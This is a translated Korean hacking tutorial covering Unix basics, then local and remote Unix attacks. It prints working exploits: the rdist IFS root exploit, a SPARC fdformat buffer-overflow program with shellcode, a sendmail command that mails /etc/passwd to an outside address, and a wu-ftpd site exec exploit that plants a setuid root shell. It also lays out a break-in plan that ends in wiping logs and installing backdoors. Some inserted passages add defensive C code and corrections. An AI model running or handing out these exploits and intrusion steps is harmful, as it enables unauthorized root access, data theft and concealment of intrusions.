Hacking and Security (II)

Lee Jae-wook : salsari@hotmail.com


1. Before getting into practical hacking

    OK. From here on we get into practice. All that talk of the Internet and Unix so far probably gave you a bit of a headache...
    Ugh~ but those basics are the foundation you need in order to understand what follows. Before we start, I'll explain the terms you need to know and how to use Unix.. so follow along.
    COME COME COME BABY!!

    1.1 Understanding Unix

    Hacking is practice. So I recommend that you install Linux on your own computer or, if you can manage it, get a shell account somewhere and study Unix. If neither is possible, here is a place where you can use Unix as much as you like while learning about hacking. (Unfortunately some features are not available there..) - Those of you who already have an account or run Linux should have a look too.

    Hackerslab - Free Hacking Zone
    [
    http://www.hackerslab.org ]

    For details, see the Hackerslab home page.

    - Shell
    The shell sits between the kernel and the user's commands: it is a program that interprets the commands the user types and hands them to the kernel for execution.

    - Process
    A running program together with the information the system keeps about it (PID, owner, open files and so on).

    - Login
    Unix is a multi-user system, so you can only connect and use its resources if you know your login name and password. - this is the actual process of connecting to the computer:

    Trying 255.255.255.254...
    Connected to jungmin.org.
    Escape character is '^]'.

    SunOS 5.6

    login: salsari # login name - type salsari
    Password: # password (not echoed on the screen) - type your password
    Last login: Fri Oct 8 19:17:37 from salsari.org # if the password is right you are logged in..
    Sun Microsystems Inc. SunOS 5.6 Generic August 1997
    You have mail.
    jungmin% # the shell prompt appears. Connection complete

    - Logout
    Leaving the system when you are done using it.

    % ^d  # Ctrl+d (some systems have Ctrl+d disabled. In that case type logout.)
    Connection closed by foreign host.

    - Differences between bash and csh
    When you log in you will get a prompt like '$' or '%': the former is bash (sh-style), the latter csh (tcsh). Using them is much the same, but there are small differences. Briefly:

    Setting the search path...
    bash(sh) : export PATH=".:/bin:/usr/bin"
    csh : set path = (. /bin /usr/bin)

    Note that "." at the head of the path means a program in the current directory is run in preference to the system one; keep that in mind when you read the rdist trick in chapter 2, and keep it out of root's path.

    - Differences between System V and BSD Unix
    As with bash and csh, there is no big difference in day-to-day use; the command options just differ a little from one to the other. Again, briefly:

    System V

    % ps -ef # % : csh - run on Solaris
    UID PID PPID C STIME TTY TIME CMD
    root 0 0 0 Aug 05 ? 0:12 sched
    root 1 0 0 Aug 05 ? 4:22 /etc/init -
    root 2 0 0 Aug 05 ? 0:08 pageout
    root 3 0 1 Aug 05 ? 648:44 fsflush
    root 482 1 0 Aug 05 ? 0:00 /usr/lib/saf/sac -t 300
    root 401 1 0 Aug 05 ? 0:00 /usr/lib/power/powerd
    ......

    BSD

    $ ps -aux # $ : bash - run on Linux
    USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND
    bin 163 0.0 0.6 900 384 ? S Sep 14 0:00 portmap
    news 362 0.0 1.8 1668 1160 ? S Sep 14 0:01 /usr/sbin/innd -p4 -r
    news 377 0.0 0.4 872 280 ? S Sep 14 0:00 /usr/lib/news/bin/ove
    news 403 0.0 0.9 1244 616 ? S Sep 14 18:05 sh /usr/lib/news/bin/
    nobody 20717 0.0 1.0 1180 684 ? S 17:05 0:00 httpd
    ......

    - Permissions
    Who is allowed to access a file, and how.

    An example:

    % ls -l # like dir in DOS
    drwxr-xr-x 2 salsari users 512 Oct 8 19:18 .
    drwxr-xr-x 194 root other 3584 Oct 4 10:57 ..
    -rwx------ 1 salsari users 0 Oct 8 19:27 kkk
    -rw-rw-rw- 1 salsari users 8 Oct 8 19:22 kkk1
    -rwxr-xr-x 1 salsari users 29836 Oct 8 19:28 salsari.hwp


    Character   Meaning        Mode value   Meaning
    d           directory      400          User (owner) read (r)
    r           read           200          User write (w)
    w           write          100          User execute (x)
    x           execute        040          Group read
    -           not allowed    020          Group write
                               010          Group execute
                               004          Other read
                               002          Other write
                               001          Other execute


    With the characters and mode values in mind, let's work through how to read a permission.

    There are 10 positions in all. (Count them if you are not sure; it is definitely 10. ^^)
    If the first position is [-] it is a regular file; if it is [d] it is a directory.
    The remaining 9 positions split into three fields.
    ---/---/--- : the first field is the mode for the user (owner), the second for the group, the third for other (everyone else).
    Within each field the first position is read (r), the second write (w), the third execute (x). From the table above, read (r) is worth 4, write (w) 2 and execute (x) 1.
    I suspect that still isn't clear.. --; A concrete example:

    user read + user write + user execute + group read + other execute
    r + w + x + r + x = rwxr----x
    400 + 200 + 100 + 40 + 1 = 741

    Got it now?... Make sure you remember it. So shall we try reading a few permissions?

    drwxr-xr-x 2 salsari users 512 Oct 8 19:18 .
    # current directory
    drwxr-xr-x 194 root other 3584 Oct 4 10:57 ..
    # parent directory
    A directory whose owner can read, write and execute (enter) it, while group and others can only read and execute it. [.] is the current directory, [..] the parent directory. (mode 755)

    -rwx------ 1 salsari users 0 Oct 8 19:27 kkk
    The first position is [-], so it is a regular file.

    -/rwx/---/--- : only the owner can read, write and execute it. (mode 700)

    -rw-rw-rw- 1 salsari users 8 Oct 8 19:22 kkk1
    Regular file; owner, group and others can all read and write it. (mode 666)

    -rwxr-xr-x 1 salsari users 29836 Oct 8 19:28 salsari.hwp
    Regular file; the owner can read, write and execute it, group and others can only read and execute it. (mode 755)

    - Set user id
    Looking through files you will sometimes see an s in the user execute position, as in '-rws--x--x'. An s in that position is called setuid (set user id), and it means that while the file runs it acts with the privileges of the file's user (owner), whatever the privileges of whoever started it. So what does a file like this mean?
    Heh heh~~~ look at the next example.

    -r-sr-xr-x 3 root root 88620 Sep 15 1999 bash
    The file is called bash... it must be a shell. Owned by root, with setuid set... so running this file gives anyone root's privileges.. Isn't that nice? Just run that one file and you are root.. quite a promotion...
    After a break-in the shell is usually copied under another name into a directory like /usr/bin and made setuid, to serve as a backdoor. (One caveat: bash drops its effective uid back to the real uid unless it is started with -p, so a setuid copy of bash only gives root as "bash -p"; the old Bourne sh has no such check, which is why the exploits below copy /bin/sh.)

            Mode value   Meaning          Note
            4000         Set user id
            2000         Set group id
            1000         Sticky bit       shared mode

    The sticky bit is commonly used on directories such as /tmp.

    drwxrwxrwt 2 root root 512 Nov 8 11:11 temp

    As the example shows, anyone can create files and directories in /tmp, but the only ones you can delete are those you own. (Heh.. too bad..) You can never delete files other people have created (only root can). - hence "shared mode"..

    - Redirection / pipes (|)

    > file : the output of the command goes into file (overwriting it).
    >> file : the output is appended to file.
    < file : the contents of file are used as the command's input.
    << kkk : input is taken from the following lines until a line containing the string kkk (a here document).

    > Things you should try for yourself
    % cat > kkk # when you have finished typing, press ^D (Ctrl + D).
    % cat >> kkk
    % cat < kkk

    A pipe (|) acts as a kind of filter.
    cmd | cmd1 : the output of cmd is used as the input of cmd1.

    > Worth running
    % ps -ef | grep root

    > Other Unix commands are omitted for brevity.. ^^;
    ( the lame excuse of the one who omits them - study! Study!! (-.- )( -.-) )

    1.2 Terms you need to know for hacking

    bug : a flaw in a program's source that makes it misbehave.
    hole : a bug or routine that can be used as the target of an attack.
    packet : the basic unit of data communication: data cut into pieces, each with the relevant addressing and control information attached.
    backdoor : a back door, a hole in the fence.
    attack : an attack, an intrusion.
    local host : the host you are currently using.
    remote host : a host elsewhere on the network.
    vulnerability : a security weakness in a system that can be exploited.
    Advisory : a report describing the problem with, and the fix for, one or more exploitable bugs or routines.
    Exploit : the use of a security weakness, or the program that does so.

    1.3 Kinds of hacking

    Hacking can be broadly divided into three kinds.

    - Local attack
    An attack by which an intruder who already has access to the target system (for example after a remote attack) obtains root privileges.
    It uses bugs in local programs, environment-variable manipulation, race conditions, and mistakes in the system's configuration made by the administrator.

    - Remote attack
    Attacking from outside, using bugs in the target host's daemons, misconfigured services such as NIS/NFS, or information about its users; the basic goal is for the outside intruder to obtain a shell on the target system.

    - DoS (Denial of Service)
    Denial-of-service attacks. Covered in detail later.


2. Local attack

    Hmm.. what shall we look at first? How about rdist, which once lit up SunOS so colourfully?
    Let's go through it with the advisory 8lgm published on the rdist bug at hand.
    > Wait! Before that
    What is the principle behind the rdist hack? (Remember that every hack has an underlying principle.) It is this: manipulate the IFS environment variable to obtain a root shell. So..

    - What is IFS?
    IFS stands for Internal Field Separator; it is the shell variable that defines which characters separate a string into words (for example when the shell builds the argument list for an external program).
    By default IFS is whitespace: space, tab and newline - IFS=" " plus tab and newline.
    If you want to change IFS to a slash [/], in csh use setenv IFS / and in bash use export IFS="/". To get a feel for what that does, a simple example:

    $ cat > pwd1 # create the file pwd1
    #!/bin/sh # shell script, run by sh
    IFS="/" # define IFS as [/]
    echo `pwd` # print the result of pwd (the original shows "export" here, but only an echo produces the output below)
    ^D  # finish input and save

    $ pwd  # show the current directory as an absolute path
    /var/tmp
    $ chmod 700 pwd1 # make the file executable
    $ ./pwd1 # run the script we just wrote
    var tmp # because IFS was set to [/], the path is split into the two words var and tmp

    IFS acts as the separator for the words produced by the command substitution, so var and tmp are recognised as separate words. Now look at the next example; it shows where the security hole in rdist comes from.

    % cat > distex
    #!/bin/sh
    IFS="/"
    export PATH
    /bin/sh
    ^D

    % ./distex
    distex: bin: not found # with IFS="/" the old Bourne shell splits the literal /bin/sh into the words bin and sh, looks for a program called bin in PATH and does not find one.

    (Caveat: this second example only behaves this way under the old Bourne shell. POSIX shells such as today's sh, bash and ksh apply IFS only to the results of expansions, never to literal words in the script, so on a current system ./distex simply starts a shell, and setuid-aware shells reset an inherited IFS at startup. The 1991 rdist bug depended on the old behaviour.)

    Now let's go through it step by step.

    [8lgm]-Advisory-1.UNIX.rdist.23-Apr-1991 # 1991... a genuine classic, right?

    rdist(1) uses popen(3) to execute sendmail(8) as root.
    It can therefore be made to execute arbitrary programs as root.
    # rdist is used to distribute files to other systems (and runs setuid root).
    # The attacker runs rdist with the environment variable IFS set to '/'.
    # While running, rdist uses popen(3) to execute /usr/lib/sendmail.
    # popen(3) hands the command to /bin/sh, and the old Bourne shell honours the inherited IFS, so "/usr/lib/sendmail" is split into the words usr, lib and sendmail and a program called usr is searched for in PATH.

    Any user with access to rdist(1) can become root.
    # So any user can become root through rdist..

    # Create a distfile with the following contents.
    HOSTS = localhost
    FILES = BullInTheHeather
    ${FILES} -> ${HOSTS}
    install /tmp/1 ;
    notify user ;

    # Create usr.c with the following contents (this is the program that gets run instead of sendmail).
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/stat.h>

    int main(void)
    {
        setuid(0);               /* we are running as root inside rdist */
        chown("sh", 0, 0);       /* make the copied shell root-owned */
        chmod("sh", 04755);      /* and setuid root */
        exit(0);
    }

    # From here on we run it.

    > % cp /bin/sh . # copy /bin/sh into the current directory (.)
    > % cc -o usr usr.c # compile usr.c
    > % set path=(. $path) # put the current directory first in the path, so "usr" resolves to ./usr
    > % setenv IFS / # this is csh. Set IFS to /
    > % rdist # run rdist (the notify line makes it call sendmail)
    updating host localhost
    rdist: BullInTheHeather: No such file or directory
    notify @localhost ( user )
    > % ls -l
    -rwsr-xr-x 1 root 106496 Mar 4 00:25 sh
    # Wow~ a setuid-root shell has appeared in the current directory. Hack succeeded!! Root obtained!!
    > % ./sh # run the shell.

    # (root shell) # root privileges obtained

    Well.. feeling proud? There will still be Unix servers on which this bug works. Anywhere running a version before SunOS 4.1.2 that has not been patched, this bug will succeed. - Was it last year? There was a server where I got root with this bug... I can't quite remember which one now.. (Only last year! With a careless administrator it goes straight in. Hahaha~)
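    The IFS principle behind rdist in working code, as an added example that is not from the original article or the 8lgm advisory: ifs_split reproduces the old Bourne-shell word splitting that turned "/usr/lib/sendmail" into a search for a program named usr, notify_unsafe shows the popen() pattern rdist used, and build_safe_env is the fix a setuid program needs before it runs anything: a pinned PATH and IFS and nothing from the caller except a short allow-list. The variable names and the allow-list are my own choices.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Old Bourne-shell word splitting: every IFS character is a separator,
 * even inside a literal such as "/usr/lib/sendmail". Stores up to max_words
 * malloc'ed copies in words[] and returns how many it found. */
int ifs_split(const char *cmd, const char *ifs, char **words, int max_words)
{
    int n = 0;
    const char *p = cmd;
    while (*p && n < max_words) {
        const char *start;
        while (*p && strchr(ifs, *p)) p++;        /* skip leading separators */
        if (!*p) break;
        start = p;
        while (*p && !strchr(ifs, *p)) p++;       /* run to the next separator */
        words[n] = malloc((size_t)(p - start) + 1);
        memcpy(words[n], start, (size_t)(p - start));
        words[n][p - start] = '\0';
        n++;
    }
    return n;
}

/* What rdist effectively did: hand a command line to /bin/sh through
 * popen() while still carrying the caller's environment. With IFS="/" and
 * "." at the head of PATH the shell runs ./usr instead of /usr/lib/sendmail.
 * Shown for reference; nothing here calls it. */
FILE *notify_unsafe(void)
{
    return popen("/usr/lib/sendmail -t", "w");
}

/* Small copy helper so the block does not depend on strdup(). */
static char *copy_string(const char *s)
{
    size_t len = strlen(s) + 1;
    char *out = malloc(len);
    memcpy(out, s, len);
    return out;
}

/* The fix: build the child's environment from scratch. PATH and IFS are
 * pinned, and only a short allow-list of harmless caller variables is kept,
 * so IFS, PATH, LD_PRELOAD and friends from the invoking user never reach
 * the shell. Returns a NULL-terminated malloc'ed array usable with execve(). */
char **build_safe_env(char *const *caller_env)
{
    static const char *const keep[] = { "HOME=", "USER=", "LOGNAME=", "TZ=", "LANG=" };
    size_t cap = 8, n = 0, i, k;
    char **out = malloc(cap * sizeof *out);
    out[n++] = copy_string("PATH=/usr/bin:/bin");   /* no "." and no caller control */
    out[n++] = copy_string("IFS= \t\n");            /* the default separators, set explicitly */
    for (i = 0; caller_env && caller_env[i]; i++) {
        for (k = 0; k < sizeof keep / sizeof keep[0]; k++) {
            if (strncmp(caller_env[i], keep[k], strlen(keep[k])) == 0) {
                if (n + 2 > cap) out = realloc(out, (cap *= 2) * sizeof *out);
                out[n++] = copy_string(caller_env[i]);
                break;
            }
        }
    }
    out[n] = NULL;
    return out;
}

/* Helpers for inspecting an environment array. */
const char *env_get(char *const *env, const char *name)
{
    size_t len = strlen(name);
    for (; env && *env; env++)
        if (strncmp(*env, name, len) == 0 && (*env)[len] == '=')
            return *env + len + 1;
    return NULL;
}

int env_count(char *const *env)
{
    int n = 0;
    for (; env && *env; env++) n++;
    return n;
}

int main(void)
{
    char *w[8];
    int n, i;
    n = ifs_split("/usr/lib/sendmail -t", "/", w, 8);
    printf("with IFS=\"/\" the shell sees %d words; argv[0] is \"%s\"\n", n, w[0]);
    for (i = 0; i < n; i++) free(w[i]);
    return 0;
}
```

    The complete fix in a setuid program is the pair: exec the mailer by absolute path with execve() and the array from build_safe_env, never through popen() or system(), so there is no shell to interpret IFS or PATH at all.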

    Besides manipulating environment variables like this to get root, you can also exploit race conditions, and holes also arise from the administrator's own mistakes and misconfiguration. The latter are worse because the administrator does not know about them (they are sure they did everything right..). (Normally when a bug is found, a patch that fixes it follows. But a hole created by an administrator's mistake has no patch; it needs the administrator's attention and care.)
    And there is the buffer overflow, currently the most important local attack technique.

    Race conditions -
    These are typically used against programs that create temporary files. The program creates a temp file, writes to it and deletes it when done; in the window just before the write, the attacker replaces the file name (usually with a symbolic link to a file of their choosing), so the privileged program writes the attacker's chosen content into the attacker's chosen file.
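    A worked version of the temp-file race just described, added here as an example (it is not code from the original article). The racy creator uses O_CREAT|O_TRUNC, so if the attacker has already planted a symlink at the expected name the privileged program follows it; the safe creator uses O_EXCL|O_NOFOLLOW and fails instead. demo_symlink_race stages both sides in a private directory under /tmp; the directory and file names are my own choices.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* The racy pattern: open the expected temp-file name with O_CREAT|O_TRUNC.
 * If an attacker planted a symlink under that name in the window before the
 * open, a privileged program truncates and writes whatever the link points at. */
int create_tmp_racy(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* The fix: O_EXCL makes creation fail if anything already exists under that
 * name (a symlink included, whether or not it dangles), and O_NOFOLLOW refuses
 * to traverse a link at the final path component. */
int create_tmp_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Stage the attack in a private directory: the "attacker" plants
 * <dir>/tmpfile -> <dir>/victim before the "program" runs. Returns 1 when the
 * racy open followed the link (victim appeared) and the safe open refused,
 * 0 if either side behaved differently, -1 on setup failure. */
int demo_symlink_race(void)
{
    char dir[64], link_path[96], victim[96];
    struct stat st;
    int fd, racy_followed, safe_refused;

    snprintf(dir, sizeof dir, "/tmp/race-demo-%ld", (long)getpid());
    if (mkdir(dir, 0700) != 0) return -1;
    snprintf(link_path, sizeof link_path, "%s/tmpfile", dir);
    snprintf(victim, sizeof victim, "%s/victim", dir);
    if (symlink(victim, link_path) != 0) return -1;   /* attacker wins the race */

    fd = create_tmp_racy(link_path);                  /* victim is silently created/truncated */
    if (fd >= 0) close(fd);
    racy_followed = (stat(victim, &st) == 0);

    fd = create_tmp_safe(link_path);
    safe_refused = (fd < 0 && (errno == EEXIST || errno == ELOOP));
    if (fd >= 0) close(fd);

    unlink(victim); unlink(link_path); rmdir(dir);
    return racy_followed && safe_refused;
}

int main(void)
{
    int r = demo_symlink_race();
    printf("racy open followed the planted symlink while the safe open refused: %s\n",
           r == 1 ? "yes" : r == 0 ? "no" : "setup failed");
    return 0;
}
```

    mkstemp(3) gives the same O_EXCL guarantee with a random name, so prefer it over building /tmp paths by hand. Note that the sticky bit on /tmp (section 1.1) stops other users deleting your file but does nothing against a symlink planted under a name that does not exist yet, which is exactly what this race exploits.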

    Buffer overflows -
    The first buffer overflow attack can be said to be the one against the finger daemon used by the Morris Worm, which shook the whole world in 1988. Because technical knowledge of it was scarce back then it remained little known, but after Aleph One's article "Smashing the Stack for Fun and Profit" in Phrack issue 49 (1996) explained the principle in detail and showed how to build one, a great many buffer overflow attacks have appeared, and they keep coming.

    The principle in brief :
    Overflow a buffer on the stack so that the saved return address is overwritten, and make it point at code of your choosing, so that arbitrary commands are executed.. (If I went through the original article in detail you might not follow. Knowing this much is enough... - but what I just said is the core! The core!!)

    Now shall we look at a program that triggers a buffer overflow?
    fdformat is the utility used to format floppy disks and PCMCIA memory cards.
    The bug comes from not checking the length of its argument.

    /*
    Solaris 2.5.1 - this exploit was compiled on Solaris 2.4 and tested on 2.5.1
    */ /* exploit code for Solaris 2.4 through 2.5.1 (SPARC only: SPARC shellcode and a SPARC stack-pointer read) */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/types.h>
    #include <unistd.h>

    #define BUF_LENGTH 364
    #define EXTRA 400
    #define STACK_OFFSET 704
    #define SPARC_NOP 0xa61cc013

    /* This is the shellcode, the part that actually yields the root shell. */
    u_char sparc_shellcode[] =
    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
    /* ............. two lines of shellcode removed by the author */
    /* ................... */
    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
    "\x91\xd0\x20\x08";

    /* Read the current stack pointer; on SPARC %i0 is the return register,
       so this "returns" %sp without a return statement. */
    u_long get_sp(void)
    {
        __asm__("mov %sp,%i0 \n");
    }

    int main(int argc, char *argv[])
    {
        char buf[BUF_LENGTH + EXTRA + 8];
        long targ_addr;
        u_long *long_p;
        u_char *char_p;
        int i, code_length = strlen((char *)sparc_shellcode), dso = 0;

        if (argc > 1) dso = atoi(argv[1]);          /* optional extra stack offset to try */

        long_p = (u_long *) buf;
        targ_addr = get_sp() - STACK_OFFSET - dso;  /* guessed address of the NOP sled */
        for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
            *long_p++ = SPARC_NOP;                  /* NOP sled: any landing point slides into the shellcode */

        char_p = (u_char *) long_p;

        for (i = 0; i < code_length; i++)
            *char_p++ = sparc_shellcode[i];         /* the shellcode itself */

        long_p = (u_long *) char_p;

        for (i = 0; i < EXTRA / sizeof(u_long); i++)
            *long_p++ = targ_addr;                  /* the guessed address, repeated over the saved frame */
        *(char *) long_p = '\0';                    /* terminate the string so execl sees a proper C string (added) */

        printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
               targ_addr, BUF_LENGTH, EXTRA, STACK_OFFSET);
        execl("/bin/fdformat", "fdformat", &buf[1], (char *) 0);   /* the oversized argument does the overflow */
        perror("execl failed");
        return 1;
    } /* If you don't follow this, learn Unix programming.. (me too.. me too.. --;) */

    To compile and run it, briefly:

    % gcc -o fdformat fdformat.c
    % ./fdformat
    .....
    ...
    # whoami
    root

    If the system is patched it naturally won't work....
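    What the fdformat patch boils down to, as an added example that is neither the original Solaris code nor the exploit author's: the bug class side by side with its fix. parse_device_unsafe copies an argument of attacker-chosen length into a fixed 364-byte stack buffer, exactly the shape the exploit above feeds with a NOP sled, shellcode and a guessed return address; parse_device_safe checks the length against the buffer first. The function names and DEV_LEN are illustrative.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEV_LEN 364   /* fixed-size stack buffer, the same size the exploit above targets */

/* The bug class. strcpy copies until the NUL, so an argument of 700+ bytes
 * runs past devname over the saved frame pointer and return address; the
 * exploit above fills that overrun with NOPs, shellcode and targ_addr.
 * Kept only to show the shape; never call it with untrusted input. */
void parse_device_unsafe(const char *arg)
{
    char devname[DEV_LEN];
    strcpy(devname, arg);                 /* no length check */
    printf("device: %s\n", devname);
}

/* The fix: reject anything that does not fit (including the terminating NUL)
 * before copying, and copy with an explicit bound. Returns the length copied
 * or -1 when the argument is too long. */
int parse_device_safe(const char *arg, char *out, size_t outlen)
{
    size_t n = strlen(arg);
    if (outlen == 0 || n >= outlen)       /* n == outlen would leave no room for the NUL */
        return -1;
    memcpy(out, arg, n + 1);
    return (int)n;
}

/* Test helper: feed the safe parser an argument of `len` 'A' bytes (the
 * shape of the exploit's padding) into a DEV_LEN buffer and report its verdict. */
int safe_accepts_length(size_t len)
{
    char out[DEV_LEN];
    char *arg = malloc(len + 1);
    int r;
    memset(arg, 'A', len);
    arg[len] = '\0';
    r = parse_device_safe(arg, out, sizeof out);
    free(arg);
    return r;
}

int main(int argc, char *argv[])
{
    char devname[DEV_LEN];
    const char *arg = argc > 1 ? argv[1] : "/dev/rdiskette";
    if (parse_device_safe(arg, devname, sizeof devname) < 0)
        fprintf(stderr, "device name too long (%lu bytes, limit %d)\n",
                (unsigned long)strlen(arg), DEV_LEN - 1);
    else
        printf("device: %s\n", devname);
    return 0;
}
```

    Run it with a 700-character argument (the exploit hands fdformat about twice the buffer size) and the safe version refuses; the unsafe version would have written the excess over the return address.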

    That is about as far as I will take local attacks. Roughly.. ah~ so that's how it's done.. that's how they attack... Know that much and move on.


3. Remote attack

    You got a rough idea of remote attacks above. Straight into the attack~ Charge!

    - The sendmail bug
    The representative remote-attack target is Sendmail. It is so much larger than other programs that it has correspondingly more bugs. (It has plenty of local bugs as well...)

    This particular bug was popular a few years ago in sendmail version 4.1 on SunOS 4.1.x. So once again, let's go through it slowly.

    % telnet salsari.org 25 # telnet into the SMTP port.
    Trying 255.255.255.255 ...
    Connected to salsari.org. # connected.
    Escape character is '^]' # if you want to get out, press Ctrl + ].

    220 salsari.org Sendmail 4.1/SMI-4.1 ready at Wed, 6 Mar 99 01:59:21 KST
    # check the sendmail version

    mail from:"|/bin/mail salsari@hotmail.com < /etc/passwd"
    # an order to mail /etc/passwd to salsari@hotmail.com - using the pipe (|) bug
    # in this version a sender address beginning with a pipe is handed to a shell, so the command after the pipe gets executed.

    250 "|/bin/mail salsari@hotmail.com < /etc/passwd"... Sender ok # the daemon accepted it.

    rcpt to : root # recipient: root
    250 root... Recipient ok # the daemon says "understood"
    data # write the message body
    354 Enter mail, end with "." on a line by itself
    babo... # "fool"... -_- (put in anything at all.)
    . # a line with only a period ends the body.
    250 Mail accepted
    quit # leave.
    221 salsari.org delivering mail
    Connection closed by foreign host.

    # The connection is closed; now just wait for the password file to arrive in your mailbox.

    Crack the password file obtained this way (if you are lucky you may even get root's password), log in locally, and use one of the many local bugs to get root.

    Now let's look at a somewhat more recent bug, in wu-ftpd 2.4.
    Because it lets you run the site exec command, a root shell is easy to obtain.

    COMMAND
    wu.ftpd(8)

    SYSTEMS AFFECTED
    Sites running wuarchive ftpd versions prior to 2.3 or running
    "wrl" ftpd version ??

    PROBLEM: # the site exec command lets an FTP user run shell commands on the server.

    Compile program : # the attack program - write it, then compile it.
    # compile : cc -o ftpbug ftpbug.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    int main(void)
    {
        seteuid(0);                          /* the daemon left the real uid at 0; take the effective uid back */
        system("cp /bin/sh /tmp/.sh");       /* copy the shell, now root-owned */
        system("chmod 6777 /tmp/.sh");       /* and make it setuid/setgid root */
        return 0;
    }

    Login to the system : # once it is compiled, connect with ftp

    220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready.
    Name (exploitablesys:root): goodaccount # type your own user name
    331 Password required for goodaccount.
    Password: (password) # type your password
    230 User goodaccount logged in.
    Remote system type is UNIX.
    Using binary mode to transfer files.

    See if system is exploitable : # test whether the ftp bug is present.

    ftp> quote "site exec bash -c id" # when you enter this command...
    200-bash -c id # the id command is run
    200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
    200 (end of 'bash -c id') # if the result looks like this (real uid 0), it is a target.

    Exploit system : # if the test succeeded, carry out the real attack.

    # Running the attack program we prepared creates /tmp/.sh, a shell
    # that gives root privileges.
    ftp> quote "site exec bash -c /yer/home/dir/ftpbug"
    200-bash -c /yer/home/dir/ftpbug
    200 (end of 'bash -c /yer/home/dir/ftpbug')
    ftp> quit # it has run, so leave.
    221 Goodbye. # then run /tmp/.sh!!!! From now on you are root!!!

    We have looked at two remote attack examples, and both are holes in how the daemon handles what it is given (user input passed straight to a shell) rather than memory-corruption bugs. Besides these there are buffer overflows in the daemons themselves. The representative one is the recently published remote buffer overflow in the wu-ftpd 2.4.2 series.


4. Recent bugs

    - Linux
    Linux_INN - Red Hat Linux 6.0 INN vulnerability and countermeasures
    Linux_pop2d - pop2d vulnerability and countermeasures
    Linux super buffer overflow - super buffer overflow vulnerability and countermeasures

    - Sun / Solaris
    SUN-automountd - SUN automountd vulnerability
    SUN-passwd - Sun passwd denial-of-service vulnerability and countermeasures
    Sun man/catman - Sun man/catman vulnerability and countermeasures
    Sun CDE - Sun CDE vulnerability and countermeasures
    SUN sdtcm_convert - sdtcm_convert vulnerability and countermeasures
    Solaris_libc - Solaris libc vulnerability and countermeasures

    - HP/UX
    HP sendmail DOS - HP Sendmail DoS vulnerability and countermeasures
    HP_ftp - HP-UX ftp vulnerability and countermeasures
    HP CDE ttsession - HP CDE ttsession vulnerability and countermeasures

    - AIX
    AIX Vulnerability in ptrace() system call - AIX ptrace() system call denial-of-service vulnerability
    AIX named-xfer security problem - AIX named-xfer security vulnerability and countermeasures
    AIX pdnsd buffer overflow - IBM AIX pdnsd buffer overflow vulnerability and countermeasures

    - IRIX
    IRIX X server path - IRIX X server path vulnerability and countermeasures
    IRIX_midikeys - IRIX midikeys vulnerability and countermeasures

    - DoS
    tcp-denial-of-service - TCP/IP denial-of-service vulnerability and countermeasures
    Using the Domain Name System DoS attack - denial-of-service (DoS) attack using the Domain Name System

    - Trojan / virus
    Trojan Tcp Wrapper - trojaned version of TCP Wrapper
    Melissa-Macro-Virus - Melissa macro virus
    CIH-Virus - CIH virus

    - FTP
    FTP-buffer overflows - FTP buffer overflow vulnerabilities and countermeasures
    Remote buffer overflow in ftpd daemon.
    ProFTPD versions before 1.2.0pre1 are vulnerable
    All wu-ftpd versions up to and including 2.4.2 (beta 18) are vulnerable
    wu-ftpd VR series - versions before 2.4.2 (beta 18) VR10 are vulnerable
    BeroFTPD versions before 1.2.0 are vulnerable
    NcFTPd versions before 2.3.4 are vulnerable
    Crashing FTP Serv-U 2.5 - FTP Serv-U 2.5 vulnerability and countermeasures

    - Etc.
    lsof buffer overflow - lsof buffer overflow vulnerability and countermeasures
    umapfs - umapfs vulnerability and countermeasures
    cmsd-Buffer Overflow - Calendar Manager buffer overflow vulnerability and countermeasures
    Accelerated-X Overflow - Accelerated-X X server vulnerability and countermeasures
    Tiger vulnerability - Tiger vulnerability and countermeasures
    amd buffer overflow vulnerability - amd remote buffer overflow vulnerability and countermeasures


5. How hackers go about a hack

    Above you saw how root is obtained on a local host and on a remote host. But those are the extreme cases. We should now look at the sequence a hacker actually goes through to break into a system and end up with root.

    5.1 Information gathering

    Say the system you are using is A and the target is B: first you collect information about B. If you already have an account on B, or know one, things are easier; if not, you have to get onto B somehow. (Because local bugs are endless compared with remote ones... and if a remote bug gives root straight away, so much the better...)
    To do that you look with finger, smtp, rusers, rpcinfo and the like for accounts that could be used, or for remote bugs B might have. There are remote bug scanners that report such bugs automatically; sscan and mscan are representative examples. You also need the administrator's habits: at what hours do they log in and work? Which non-root login name (account) does the administrator use? How long is root's idle time? (The longer root stays idle, the lazier the administrator looking after the system.)
    Once you have gathered the information about the system, draw up a concrete plan.

    5.2 Planning
    Which route will you take?

    - Does B have a remote bug that yields root, so you can become root directly?
    - Get root on A first and use that to obtain an account on B?
    - Is there a weak account on B to get in through?
    - Crack a passwd file obtained through a cgi bug or similar?

    If you got in as root
    - remove the log entries and install a backdoor (see below)
    If you got in as an ordinary user
    - find a local bug on B and use it to get root.
    - remove the log entries and install a backdoor so you can get back in easily.

    So, have you drawn up the plan and put it in order?

    5.3 Remote attack
    Carry out the remote attack. Whether it yields root or only an ordinary user, get onto B first!

    5.4 Local attack
    Get root with a local bug.

    5.5 Covering tracks
    If you got in, and especially if you got root, you have left traces. The last command, /var/adm/messages (or /var/log/messages on Linux), /var/adm/utmp, /var/adm/wtmp and so on will show them, and they have to be removed without anyone noticing and without leaving any other change behind.

    5.6 Installing a backdoor
